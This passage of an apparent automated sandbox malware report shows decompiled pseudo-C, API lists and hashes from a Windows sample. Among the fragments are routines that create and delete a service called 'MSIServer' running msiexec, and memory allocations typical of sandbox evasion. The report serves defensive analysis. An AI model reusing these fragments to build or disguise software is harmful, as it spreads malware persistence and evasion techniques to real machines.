                        					 *(_t26 - 0x1c) = _t23;
                        					 *(_t26 - 4) = 0xfffffffe;
                        					E010637EC(_t25);
                        					_t14 = _t23;
                        				} else {
                        					 *((intOrPtr*)(E010647CC(_t29))) = 0x16;
                        					_t14 = E0106471D() | 0xffffffff;
                        				}
                        				return E01066935(_t14);
                        			}









                        APIs
                        • __lock_file.LIBCMT ref: 010637BC
                        • __ftell_nolock.LIBCMT ref: 010637C7
                          • Part of subcall function 010647CC: __getptd_noexit.LIBCMT ref: 010647CC
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: __ftell_nolock__getptd_noexit__lock_file
                        • String ID:
                        • API String ID: 2999321469-0
                        • Opcode ID: 1fae35ceade23196b168d64340801d28345714cb9fd911f506f6d290e113dd3d
                        • Instruction ID: 99348cb4e4a86105af53c9876f5a7e3d60a9c2b5716354859623cef72146deaa
                        • Opcode Fuzzy Hash: 1fae35ceade23196b168d64340801d28345714cb9fd911f506f6d290e113dd3d
                        • Instruction Fuzzy Hash: C1E0ED719012139AD7217BB98C017DE76AC7F11330F114285D4A8EF2C0CF7C9A019ADA
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        APIs
                          • Part of subcall function 005E07DA: GetSystemInfo.KERNELBASE(?), ref: 005E07F7
                        • VirtualAllocExNuma.KERNELBASE(00000000), ref: 005E089D
                        Memory Dump Source
                        • Source File: 00000001.00000002.261693477.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_5e0000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: AllocInfoNumaSystemVirtual
                        • String ID:
                        • API String ID: 449148690-0
                        • Opcode ID: 5104fe00cea5b6b43bfce270a0a2c81ff317ca7eb47637b87448d486c4f4107a
                        • Instruction ID: eef30bbf5182586bdb773891708d8b087842e466baa4f46063f59cb891985f61
                        • Opcode Fuzzy Hash: 5104fe00cea5b6b43bfce270a0a2c81ff317ca7eb47637b87448d486c4f4107a
                        • Instruction Fuzzy Hash: 2DF0E171D4438ABEEB187BF2480E76D7E68BF80301F50659575C0761C7DAF856808AA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 667 1063b3a-1063b4e call 1063b94
                        C-Code - Quality: 25%
                        			E01063B3A(intOrPtr _a4, intOrPtr _a8) {
                        				void* __ebp;
                        				void* _t3;
                        				void* _t4;
                        				void* _t5;
                        				void* _t6;
                        				void* _t7;
                        				void* _t10;
                        
                        				_push(0x40);
                        				_push(_a8);
                        				_push(_a4);
                        				_t3 = E01063B94(_t4, _t5, _t6, _t7, _t10); // executed
                        				return _t3;
                        			}











                        APIs
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: __wfsopen
                        • String ID:
                        • API String ID: 197181222-0
                        • Opcode ID: a3c3897a0b8e5cc1e99c40f009d05ddfac5da0d01180f44d34b11c30565e0d74
                        • Instruction ID: b3b70fe317385ef2bd3284bce97538047de10c4a051c8aa9e0d0386026ab8e62
                        • Opcode Fuzzy Hash: a3c3897a0b8e5cc1e99c40f009d05ddfac5da0d01180f44d34b11c30565e0d74
                        • Instruction Fuzzy Hash: 94B0927244020C77CE012A82EC02B897B1DAB51660F008020FB1C1C1A0A673A66096C9
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 727 5e073a-5e0781 call 5e005f call 5e0073 * 2 VirtualAlloc 734 5e0788-5e0790 727->734 735 5e0783-5e0786 727->735 736 5e07d5-5e07d9 734->736 737 5e0792-5e079f 734->737 735->734 738 5e07a2-5e07a6 737->738 739 5e07be-5e07cf 738->739 740 5e07a8-5e07bc 738->740 739->736 740->738
                        APIs
                        • VirtualAlloc.KERNELBASE(00000000,17D78400,00003000,00000004), ref: 005E0777
                        Memory Dump Source
                        • Source File: 00000001.00000002.261693477.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_5e0000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: fefa28e21f4d9309c1ecd3ac6253e750ecc73c234d91debfceddd181198d7f09
                        • Instruction ID: 957ec72d34268c20e3d089b30bf160c81effad4bf19c8216b98fa475f6c6bd73
                        • Opcode Fuzzy Hash: fefa28e21f4d9309c1ecd3ac6253e750ecc73c234d91debfceddd181198d7f09
                        • Instruction Fuzzy Hash: AF113670D00258AFDB04EBA9CC49BAEBBB4FB04304F609495E980B7291D2B15A808F90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 81%
                        			E010610B0() {
                        				short _v548;
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				void* _t13;
                        				long _t14;
                        				void* _t18;
                        				void* _t27;
                        				void* _t29;
                        				void* _t30;
                        
                        				_t28 = 0;
                        				_t29 = OpenSCManagerW(0, L"ServicesActive", 2);
                        				if(_t29 != 0) {
                        					lstrcpyW(_t30 + GetSystemDirectoryW( &_v548, 0x104) * 2 - 0x220, L"\\msiexec /V");
                        					_t13 = CreateServiceW(_t29, L"MSIServer", L"MSIServer", 0x10000000, 0x20, 3, 1,  &_v548, 0, 0, 0, 0, 0);
                        					__eflags = _t13;
                        					if(_t13 == 0) {
                        						_t14 = GetLastError();
                        						__eflags = _t14 - 0x431;
                        						if(_t14 != 0x431) {
                        							_push("Failed to create MSI service\n");
                        							_t18 = E01062E24() + 0x40;
                        							__eflags = _t18;
                        							_push(_t18);
                        							E01062F67(_t27, 0, _t29, _t18);
                        							_t28 = 1;
                        						}
                        						CloseServiceHandle(_t29);
                        						return _t28;
                        					} else {
                        						CloseServiceHandle(_t13);
                        						CloseServiceHandle(_t29);
                        						return 0;
                        					}
                        				} else {
                        					_push("Failed to open the service control manager.\n");
                        					_t24 = E01062E24() + 0x40;
                        					_push(E01062E24() + 0x40);
                        					E01062F67(_t27, 0, _t29, _t24);
                        					_t1 = _t28 + 1; // 0x1
                        					return _t1;
                        				}
                        			}














                        APIs
                        • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000002), ref: 010610C5
                        • _fprintf.LIBCMT ref: 010610DF
                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 010610FC
                        • lstrcpyW.KERNEL32 ref: 0106110F
                        • CreateServiceW.ADVAPI32(00000000,MSIServer,MSIServer,10000000,00000020,00000003,00000001,?,00000000,00000000,00000000,00000000,00000000), ref: 0106113C
                        • CloseServiceHandle.ADVAPI32(00000000), ref: 01061147
                        • CloseServiceHandle.ADVAPI32(00000000), ref: 0106114E
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: Service$CloseHandle$CreateDirectoryManagerOpenSystem_fprintflstrcpy
                        • String ID: Failed to create MSI service$Failed to open the service control manager.$MSIServer$ServicesActive$\msiexec /V
                        • API String ID: 3223182415-3703814818
                        • Opcode ID: 6003b53990d1e6ea79ad676e2f23aad3e9102bc70a052a5d35b134afddb433e1
                        • Instruction ID: 81df750d754850f02e4f6a74b757f1a360b6ab76bd681e971d473c842beb9781
                        • Opcode Fuzzy Hash: 6003b53990d1e6ea79ad676e2f23aad3e9102bc70a052a5d35b134afddb433e1
                        • Instruction Fuzzy Hash: A5110872F40218B7E73166A9BC0EF9E375CEB84711F000066FE84EA140EAAAD94487F5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 75%
                        			E010611A0(void* __edi) {
                        				void* __ebx;
                        				void* __esi;
                        				long _t4;
                        				void* _t8;
                        				int _t10;
                        				void* _t15;
                        				void* _t23;
                        				void* _t28;
                        
                        				_t21 = 0;
                        				_t28 = OpenSCManagerW(0, L"ServicesActive", 1);
                        				if(_t28 != 0) {
                        					_push(__edi);
                        					_t23 = OpenServiceW(_t28, L"MSIServer", 0x10000);
                        					__eflags = _t23;
                        					if(_t23 == 0) {
                        						_t4 = GetLastError();
                        						__eflags = _t4 - 0x424;
                        						if(_t4 != 0x424) {
                        							_push("Failed to open MSI service\n");
                        							_t8 = E01062E24() + 0x40;
                        							__eflags = _t8;
                        							_push(_t8);
                        							E01062F67(0, _t23, _t28, _t8);
                        							_t21 = 1;
                        						}
                        						CloseServiceHandle(_t28);
                        						return _t21;
                        					} else {
                        						_t10 = DeleteService(_t23);
                        						__eflags = _t10;
                        						if(_t10 == 0) {
                        							_push("Failed to delete MSI service\n");
                        							_t15 = E01062E24() + 0x40;
                        							__eflags = _t15;
                        							_push(_t15);
                        							E01062F67(0, _t23, _t28, _t15);
                        							_t21 = 1;
                        						}
                        						CloseServiceHandle(_t23);
                        						CloseServiceHandle(_t28);
                        						return _t21;
                        					}
                        				} else {
                        					_push("Failed to open service control manager\n");
                        					_t18 = E01062E24() + 0x40;
                        					_push(E01062E24() + 0x40);
                        					E01062F67(0, __edi, _t28, _t18);
                        					_t1 = _t21 + 1; // 0x1
                        					return _t1;
                        				}
                        			}












                        APIs
                        • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001,00000001,00000000,0106273B), ref: 010611AC
                        • _fprintf.LIBCMT ref: 010611C6
                        • OpenServiceW.ADVAPI32(00000000,MSIServer,00010000,00000000), ref: 010611E0
                        • DeleteService.ADVAPI32(00000000), ref: 010611ED
                        • _fprintf.LIBCMT ref: 01061205
                        • CloseServiceHandle.ADVAPI32(00000000), ref: 01061219
                        • CloseServiceHandle.ADVAPI32(00000000), ref: 0106121C
                        Strings
                        • MSIServer, xrefs: 010611DA
                        • Failed to open MSI service, xrefs: 01061231
                        • ServicesActive, xrefs: 010611A4
                        • Failed to delete MSI service, xrefs: 010611F7
                        • Failed to open service control manager, xrefs: 010611B8
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: Service$CloseHandleOpen_fprintf$DeleteManager
                        • String ID: Failed to delete MSI service$Failed to open MSI service$Failed to open service control manager$MSIServer$ServicesActive
                        • API String ID: 2904554157-4128441400
                        • Opcode ID: cbb565f9d4055a2b879283de66c7143a2d6cb3da280347170c7109bb4d7717c1
                        • Instruction ID: d70ab53e28578ea5fd8b691d87291236737b58028780e7657e3423b99680dcb0
                        • Opcode Fuzzy Hash: cbb565f9d4055a2b879283de66c7143a2d6cb3da280347170c7109bb4d7717c1
                        • Instruction Fuzzy Hash: B101D6B2F41202A7E732366AAC49BCE369CDFD4751F040035FA80EA201EA6ADD5446B9
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E0106BC7C(struct _EXCEPTION_POINTERS* _a4) {
                        
                        				SetUnhandledExceptionFilter(0);
                        				return UnhandledExceptionFilter(_a4);
                        			}



                        0x0106bc81
                        0x0106bc91

                        APIs
                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,010646B3,?,?,?,00000000), ref: 0106BC81
                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 0106BC8A
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: ExceptionFilterUnhandled
                        • String ID:
                        • API String ID: 3192549508-0
                        • Opcode ID: ca3533ff22a3badfb1a99dd3d29e054995d20f718fdaa79c7b784298cd025dcb
                        • Instruction ID: 5b29dc20bb8e6f3ccd52ee9d1caaa23b680cad113ce320c683d9925d0e44efdc
                        • Opcode Fuzzy Hash: ca3533ff22a3badfb1a99dd3d29e054995d20f718fdaa79c7b784298cd025dcb
                        • Instruction Fuzzy Hash: 84B09235448208ABCA103B91F80DB883F28EB14662F800020F64D544548B6754908B91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • EnumSystemLocalesEx.KERNEL32(?,?,?,00000000), ref: 01072C10
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: EnumLocalesSystem
                        • String ID:
                        • API String ID: 2099609381-0
                        • Opcode ID: 0c49b049f4fe36321f3ae4dc9171df1f27624dd6e8058806997d6ec8f74b1a70
                        • Instruction ID: 61ebb1ed0d987a8b6253e44148c2e711ee3dc67f79e2a9e1f0797b3d10e963e2
                        • Opcode Fuzzy Hash: 0c49b049f4fe36321f3ae4dc9171df1f27624dd6e8058806997d6ec8f74b1a70
                        • Instruction Fuzzy Hash: FBC0483204020CFBDF121E91EC05B997F2AEB09660F808010FA28190618B73A520AB84
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • GetLocaleInfoEx.KERNEL32(?,?,00000002,?,?,0106D01C,?,?,?,00000002), ref: 01072C46
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: InfoLocale
                        • String ID:
                        • API String ID: 2299586839-0
                        • Opcode ID: 9ac52f6f22f220df398882974f006f13bfab79e4c40a19da614c938504906165
                        • Instruction ID: 16fc495fe23069bcdf440fca431e75ffced2219dfb49dd259daf94ad51d9124a
                        • Opcode Fuzzy Hash: 9ac52f6f22f220df398882974f006f13bfab79e4c40a19da614c938504906165
                        • Instruction Fuzzy Hash: 09C0483200020DFBCF025F81EC0489A7F2AFB09264B408010FA1814031CB339930EB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E0106BC59(_Unknown_base(*)()* _a4) {
                        
                        				return SetUnhandledExceptionFilter(_a4);
                        			}



                        0x0106bc66

                        APIs
                        • SetUnhandledExceptionFilter.KERNEL32(?,?,0106AF7D,0106AF32), ref: 0106BC5F
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: ExceptionFilterUnhandled
                        • String ID:
                        • API String ID: 3192549508-0
                        • Opcode ID: 373c31b094e4d8af456a6fc5d3852c2a11d33eaf0352e91783da6165b6d4f6d9
                        • Instruction ID: c07d24ede41ec17a2ab375b3d15559cc174fa46f1eba85678a23e05798f5d19f
                        • Opcode Fuzzy Hash: 373c31b094e4d8af456a6fc5d3852c2a11d33eaf0352e91783da6165b6d4f6d9
                        • Instruction Fuzzy Hash: 76A0223000020CFBCF003F82FC088883F3CEB002A0B800030F80C00020CB33A8A08BC0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000001.00000002.261693477.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_5e0000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6a074607bc74a68e46ffcf8def79e123d6f3babf0396bd4cc77b36b90dcd7b6b
                        • Instruction ID: 512371b359e38a9bca3066c08085a70db4848dc1dc05b42a61b8d4f24ccf3bc6
                        • Opcode Fuzzy Hash: 6a074607bc74a68e46ffcf8def79e123d6f3babf0396bd4cc77b36b90dcd7b6b
                        • Instruction Fuzzy Hash: 6A11C236600159AFC714EF6AC8849AEBBE9FF547A47048015FC95CB250E374EDC1CB54
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000001.00000002.261693477.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_5e0000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ec8e751651157bc76042a6f737d25c3298a3c098193b98f67a4d4adab9605e7b
                        • Instruction ID: 5e2b863272e2f233f8fbdfda9b745f1e46d7742b8c4434c875800f6c842b0ca9
                        • Opcode Fuzzy Hash: ec8e751651157bc76042a6f737d25c3298a3c098193b98f67a4d4adab9605e7b
                        • Instruction Fuzzy Hash: C0E09236264189EFC708CBA9CC45D25B3F8FB09320B180290F815C73E0E674ED40D650
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000001.00000002.261693477.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_5e0000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 14c979a1a0daa279b65c5726769cbc87c4fd01d1be4397ac1552cbcc502d36f8
                        • Instruction ID: 9f9d0518e9dc9a988aa600e06013396a54fcc41ddbf782e8620efd8405e52cbd
                        • Opcode Fuzzy Hash: 14c979a1a0daa279b65c5726769cbc87c4fd01d1be4397ac1552cbcc502d36f8
                        • Instruction Fuzzy Hash: 91E0DF332102949BC7299B0ACC00D96FBE8FB887B0B4A4421ED889B610C270FC40C790
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000001.00000002.261693477.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_5e0000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                        • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                        • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                        • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 92%
                        			E01061320(int _a4) {
                        				short _v8;
                        				signed int _v12;
                        				char _v92;
                        				short _v612;
                        				signed int _t33;
                        				void* _t41;
                        				void* _t55;
                        				struct HINSTANCE__* _t57;
                        
                        				_t57 = GetModuleHandleA("msi.dll");
                        				_v612 = 0;
                        				if(GetModuleFileNameW(_t57,  &_v612, 5) == 0) {
                        					GetLastError();
                        				}
                        				_v92 = 0;
                        				_v12 = 0xa;
                        				0x1060000( &_v612,  &_v92,  &_v12, 0, 0);
                        				_t33 = LoadStringW(_t57, 0xa,  &_v8, 0);
                        				_v12 = _t33;
                        				_v8 = HeapAlloc(GetProcessHeap(), 0, 2 + _t33 * 2);
                        				_t55 = HeapAlloc(GetProcessHeap(), 0, 0x52 + _v12 * 2);
                        				_t41 = _v8;
                        				if(_t41 != 0 && _t55 != 0) {
                        					 *_t41 = 0;
                        					LoadStringW(_t57, 0xa, _v8, _v12 + 1);
                        					swprintf(_t55, _v12 + 1, _v8,  &_v92);
                        					_t41 = _v8;
                        				}
                        				HeapFree(GetProcessHeap(), 0, _t41);
                        				HeapFree(GetProcessHeap(), 0, _t55);
                        				ExitProcess(_a4);
                        			}












                        APIs
                        • GetModuleHandleA.KERNEL32(msi.dll,?), ref: 01061331
                        • GetModuleFileNameW.KERNEL32(00000000,?,00000005), ref: 0106134C
                        • GetLastError.KERNEL32 ref: 01061356
                        • LoadStringW.USER32(00000000,0000000A,00000001,00000000), ref: 01061388
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 010613A1
                        • HeapAlloc.KERNEL32(00000000), ref: 010613AA
                        • GetProcessHeap.KERNEL32(00000000,0000000A), ref: 010613BC
                        • HeapAlloc.KERNEL32(00000000), ref: 010613BF
                        • LoadStringW.USER32(00000000,0000000A,00000001,0000000B), ref: 010613DE
                        • swprintf.LIBCMT ref: 010613F1
                        • GetProcessHeap.KERNEL32(00000000,00000001), ref: 01061405
                        • HeapFree.KERNEL32(00000000), ref: 0106140E
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 01061413
                        • HeapFree.KERNEL32(00000000), ref: 01061416
                        • ExitProcess.KERNEL32 ref: 0106141B
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: Heap$Process$AllocFreeLoadModuleString$ErrorExitFileHandleLastNameswprintf
                        • String ID: msi.dll
                        • API String ID: 4014995864-3974507041
                        • Opcode ID: 0a33e521186df2e9f1d9d21cdeeda920f9874049c5a13d4cc69cea3ae593bb08
                        • Instruction ID: 381ae9cc35013970ce7a82e83cbd7f4576c94e092c77f6763ca0daef5b5f944e
                        • Opcode Fuzzy Hash: 0a33e521186df2e9f1d9d21cdeeda920f9874049c5a13d4cc69cea3ae593bb08
                        • Instruction Fuzzy Hash: CD31E571A00208BFEB21DBA4DD88FAEBBBCEF48700F000095B945E7154DA75AA459BA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E01075AAD(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				intOrPtr _t12;
                        				intOrPtr _t13;
                        				intOrPtr _t17;
                        				intOrPtr* _t45;
                        
                        				if(_a4 > 5 || _a8 == 0) {
                        					L4:
                        					return 0;
                        				} else {
                        					_t45 = E01064F0A(8, 1);
                        					_t52 = _t45;
                        					if(_t45 != 0) {
                        						_t12 = E01064F0A(0xb8, 1);
                        						 *_t45 = _t12;
                        						__eflags = _t12;
                        						if(_t12 != 0) {
                        							_t13 = E01064F0A(0x220, 1);
                        							 *((intOrPtr*)(_t45 + 4)) = _t13;
                        							__eflags = _t13;
                        							if(_t13 != 0) {
                        								E010755D5( *_t45, 0x1080d40);
                        								__eflags = E01075ECD(__ebx, __edx, 1, _t45,  *_t45, _a4, _a8);
                        								if(__eflags != 0) {
                        									_t17 = E0106DBBB(__edx, 1, __eflags,  *((intOrPtr*)( *_t45 + 4)),  *((intOrPtr*)(_t45 + 4)));
                        									__eflags = _t17;
                        									if(_t17 == 0) {
                        										 *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)))) = 1;
                        										L17:
                        										return _t45;
                        									}
                        									E01064ED2( *((intOrPtr*)(_t45 + 4)));
                        									E0107024B( *_t45);
                        									E010700F1( *_t45);
                        									E01064ED2(_t45);
                        									L15:
                        									_t45 = 0;
                        									goto L17;
                        								}
                        								E0107024B( *_t45);
                        								E010700F1( *_t45);
                        								E01064ED2(_t45);
                        								goto L15;
                        							}
                        							E01064ED2( *_t45);
                        							E01064ED2(_t45);
                        							L8:
                        							goto L3;
                        						}
                        						E01064ED2(_t45);
                        						goto L8;
                        					}
                        					L3:
                        					 *((intOrPtr*)(E010647CC(_t52))) = 0xc;
                        					goto L4;
                        				}
                        			}











                        APIs
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref$Sleep__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                        • String ID:
                        • API String ID: 2661855409-0
                        • Opcode ID: 104286de649f2d6f4931ad2800fec91f0cc7e5de3a14241637f554391639b97d
                        • Instruction ID: 9a1e47e32daa1478910b15b90e522ab9266e2bb8740fe6c329125001ad127caf
                        • Opcode Fuzzy Hash: 104286de649f2d6f4931ad2800fec91f0cc7e5de3a14241637f554391639b97d
                        • Instruction Fuzzy Hash: 6721B635D08703FEEB223F69DC45DDE7BE8EF61760B208429F5C895564EF6298208A5C
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E01061B50(short* _a4, intOrPtr _a8, WCHAR*** _a12) {
                        				void* _v8;
                        				int _v12;
                        				int _v16;
                        				intOrPtr _v20;
                        				void* _t29;
                        				intOrPtr _t43;
                        				intOrPtr _t54;
                        				void* _t57;
                        				void* _t60;
                        
                        				_v12 = 0;
                        				_v16 = 0;
                        				_t57 = 0;
                        				if(RegOpenKeyW(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\RunOnceEntries",  &_v8) == 0) {
